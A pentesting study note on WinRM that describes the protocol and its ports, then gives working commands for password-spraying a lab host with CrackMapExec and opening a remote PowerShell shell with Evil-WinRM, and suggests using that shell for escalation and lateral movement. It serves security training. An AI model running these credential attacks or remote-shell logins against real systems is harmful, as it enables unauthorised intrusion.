WinRM [5985, 5986]

WinRM is Microsoft’s implementation of the Web Services-Management Protocol (WS-Management).

  • Based on SOAP and XML Web Services

  • Enables remote administration of Windows systems

  • Interfaces with WMI, WBEM, and optionally DCOM


πŸ” Security & Configuration

  • Not enabled by default on Windows 10

  • Must be manually activated and configured

  • Heavily reliant on domain/local environment security

Port   Protocol
5985   HTTP
5986   HTTPS (secured via certificates)

Best practice: expose only the HTTPS listener (certificate-based) or another secure authentication mechanism; the HTTP listener on 5985 carries credentials over a channel that depends entirely on the message-level encryption negotiated by the client.


Tools for WinRM Exploitation

CrackMapExec (CME)

A versatile post-exploitation tool often called the Swiss Army Knife for Pentesters

Supports: SMB, LDAP, MSSQL, SSH, and WinRM

Installation

sudo apt-get -y install crackmapexec
# or
sudo apt-get -y install netexec  # Community rebrand/fork

πŸ” Example with WinRM:

crackmapexec winrm 10.129.42.197 -u user.list -p password.list

βœ”οΈ Success Output Example:

WINRM  10.129.42.197  5985  NONE [+] None\user:password (Pwn3d!)

Pwn3d! indicates a successful login and, most likely, the ability to execute commands over that session.


CME Help Options

  • General help:

crackmapexec -h

  • Protocol-specific help:

crackmapexec smb -h
crackmapexec winrm -h

Great for discovering additional modules like enumeration, file access, or lateral movement scripts.


Login with Evil-WinRM

An essential tool designed specifically for communicating with WinRM endpoints

Installation

sudo gem install evil-winrm

Basic Usage

evil-winrm -i <target-IP> -u <username> -p <password>

πŸ” Example:

evil-winrm -i 10.129.42.197 -u user -p password

On success, a PowerShell Remoting Protocol shell is launched:

*Evil-WinRM* PS C:\Users\user\Documents>

Use this session to enumerate, download/upload files, escalate privileges, and move laterally within the network.
